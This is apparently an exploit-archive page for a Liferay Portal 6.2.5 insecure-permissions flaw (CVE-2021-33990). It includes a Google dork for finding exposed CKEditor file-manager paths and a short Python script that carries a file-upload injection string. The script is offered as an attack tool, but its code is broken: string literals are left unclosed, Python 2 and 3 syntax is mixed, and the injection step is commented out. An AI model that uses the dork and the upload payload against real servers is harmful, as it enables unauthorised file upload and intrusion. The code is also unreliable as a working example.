Liferay portal 6.2.5 insecure permissions Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2023-04-05 | Type : webapps | Platform : java
This exploit / vulnerability Liferay portal 6.2.5 insecure permissions is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990

import requests
import json

print (" Search this on Google #Dork for liferay

url ="URL Goes Here
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
print ('Life Vulnerability exists')
cook = url
print cook
inject = "Command=FileUpload&Type=File&CurrentFolder=/"
#cook_inject = cook+inject
#print cook_inject
print ('not found try a another method')

print ("solution restrict access and user groups")